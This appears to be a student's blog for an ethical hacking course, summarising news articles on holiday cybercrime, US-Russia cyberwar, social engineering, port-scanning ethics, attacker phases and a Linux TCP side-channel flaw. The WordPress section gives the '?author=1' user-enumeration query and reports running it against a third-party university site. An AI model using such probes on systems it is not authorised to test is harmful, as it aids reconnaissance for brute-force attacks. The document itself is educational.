Holiday season cyber crime forecast
This article is slightly dated-it’s the forecast for the 2015 holiday season and cyber crimes associated with that time of year. One, I would assume, can be almost certain that the forecast for this season is probably very similar. With Black Friday and Cyber Monday coming up, the holiday shopping season is basically here. The spike in hacking/stealing during November and especially in December is staggering. The greatest threat of all hacks comes from financial hackers which is no surprise given the amount of money that is processed during the holiday season. Second is attacks from a political cyber warrior. I think I’ll be spending a lot more old fashioned cash this holiday season.
tis the season to be hacking- Forecast for Cybercrime activities during the holidays
US cyber warfare threat against Russia
This article discusses the current state of US-Russian relations. To say the relationship between the two superpowers is not good would be an understatement. The US has repeatedly accused Russia of hacking an revealing DNC secrets. Russia and Putin of course deny any involvement but that has not stopped the US from taking the approach that, if the Russians continue their intrusions during the election, they will launch a counter attack against the rival. The response against Russia will come after the election, according to the article. The article sites an NBC report that states the US will strike Russian electric grids, telecommunications networks, and the Kremlin’s command system. Targeting DNC emails is certain unlawful but hitting major targets such as the ones reported in Russia would have a much more devastating affect, it would seem.
http://gizmodo.com/obama-may-unleash-cyberwar-on-russia-after-election-re-1788654382
Nessus Scan Report
7 Best Social Engineering Attacks Ever
This is a great article about infamous Social Engineering attacks throughout history. The author’s tongue-in-cheek tone makes light of the intrusions, yet the damages each caused were anything but humerus. What’s very interesting about the article is that the attacks are mostly technologically based, meaning, inevitably, a hacker broke into a computer system and stole something or corrupted something but there are a few that are not. The first hack in the list dates back to the 1960s when the infamous Frank Abignale (Catch Me If You Can) used different characters to trick people into thinking he was something he wasn’t-a Trojan Horse of sorts. The article also discusses how a man was able to rob a bank without any technology at all. The only thing he deployed to obtain millions of dollars worth of jewelry was his charm. I think this is relevant to what Wade was mentioning with mingling with smokers outside of a company’s office so as to gain information. The article goes on to discuss several large hacks and how social engineering paved the road into the corrupted systems. A security analyst is quoted at the end of the article saying in so many words, “if you want to stay safe, engage end users”. Information systems are comprised, essentially, of computers, data, and end users. This article certainly suggests end users are the weakest link of the three when it comes to security.
http://www.darkreading.com/the-7-best-social-engineering-attacks-ever/d/d-id/1319411
WordPress user enumeration hacking
This article discusses one way in which a hacker can easily enumerate through authors or users of WordPress sites. To do this, the hacker takes the url of the site and places it within this url: http://example.com/?author=1. This queries the database for author=1 and returns the actual author name (username). What was pretty unsettling for me is that I actually run a WordPress site for a foundation I am a part and when I queried the site with the above url, my username was returned. What’s also interesting is that, when I ran the same url against https://mis.temple.edu for ?user=1, the returned value was “admin”. It’s one thing to know who a user is but it’s another thing for a hacker to know that the administrator username is actually admin-this is almost half the battle in carrying out a successful brute force attack. Incorrect username/password entry usually returns a “username/password incorrect” message. If you do not know for certainty what the username is, the previous message becomes more complicated. The article fortunately supplies code to add to index.php of the WordPress site to disable querying author names.
https://perishablepress.com/stop-user-enumeration-wordpress/
Ryan Boyce Reconnaissance Analysis – Philadelphia Truck Lines
Is port scanning illegal?
As we venture further into ethical hacking and network scanning, I think we begin to enter the gray area of where ethical and non ethical hacking meet. Port scanning, I believe, is right in the middle of this gray area as tools like nmap do not cause any damage to a system but is very revealing of how someone “could” cause damage. The comparison I have seen people make to explain the ethics of port scanning is it’s like going up to someone’s house and checking which windows and doors are unlocked. Could you necessarily go to jail for this? Maybe in some county in some state. Would the home owner be happy you came on to their property and started opening doors? Definitely not. Port scanning may technically not be illegal but it’s probably not ethical. There have been numerous court cases in which scanning was not found to be illegal. The article references Moulton v. VC3 to highlight this. The article also references the Computer Code of Conduct at Rochester Institute of Technology which makes no mention of scanning. As Professor Mackey stressed in the beginning of the course, it is best to get permission before any scanning/hacking activities!
https://www.sans.org/reading-room/whitepapers/legal/ethics-legality-port-scanning-71
Five Phase Approach of Malicious Hackers
This article is a little dated but it describes the approach used by hackers before, during, and after breaching a system. It gives a good overview what malicious hackers plan to do and it coincides, essentially, with what we have been covering in class. Starting with reconnaissance, a hacker will use methods such as Google Hacking as discussed in class. The most extreme example of recon is actually going to a location and physically gaining access. Next, the individual will scan the network as we will do in class or what some of us have already done to the target we have done some reconnaissance against. Ultimately, the hacker will try and gain access, keep that access, and, perhaps most importantly, cover their tracks so as not be detected. What’s most compelling to me is at the end of the article when the author mentions that a hacker must iterate through these phases. Once he or she gains access to part of the system, the reconnaissance usually has to start again. I chose to perform reconnaissance against my particular company because I felt that the industry they are in is vulnerable to attack. I also picked this company because they are not very large but have connections with very large companies that deal with sensitive information. My thinking is that, if the company I chose could be breached, then an attacker might be able to jump from their systems’ into other companies systems. This would be a classic example of iterating through the phases the article talks about.
Linux kernel network stack vulnerability
This article is about a vulnerability found in Linux kernel versions since 3.6 that allows hackers to perform a side-channel attack. At a high level, a side-channel attack allows someone to passively monitor a system through indirect channels, hence side-channel. An example of this would be watching the power supply rate of a system to determine its work-load. In this case, an attacker is not actively watching the server but can still draw conclusions as to what it is used for. Another example of this would be determining the amount of time a machine sends a response packet or how long it took to process a packet. A feature of TCP is windowing. Professor Mackey described this during our last lecture when he described TCP connections to be secure in that they will confirm or deny a remote machine’s acceptance of packets. Linux kernels since 3.6 have a feature built in that forces the machine to send “ACK” (acknowledgement) packets to a remote server it is communicating with when it thinks it is receiving bad packets. It’s basically Linux’s way of saying, ‘hey, these packets don’t look correct, can you confirm?’. In theory, this is a good thing in that it prevents attacks such as man in the middle. What hackers have found though is that they can force a Linux machine to send ACK packets by sending “spoof” (fake packets) once a connection has been made. The hacker will then watch the number of ACK packets sent out. If the number of ACK packets the hacker receives is less than the number of allowed ACK packets, the hacker knows there is a valid connection between the server and a client somewhere. The math for the next part is rather complex but it is possible to determine the TCP 32 bit sequence numbers for that specific connection and inject malicious packets into the valid connection (This video describes how this is done when RSA encryption methods are used: //www.youtube.com/watch?v=AZkDGaISXq8). This article greatly illustrates how hackers use TCP/IP to gain entry to or disrupt systems.
http://www.theregister.co.uk/2016/08/10/linux_tor_users_open_corrupted_communications/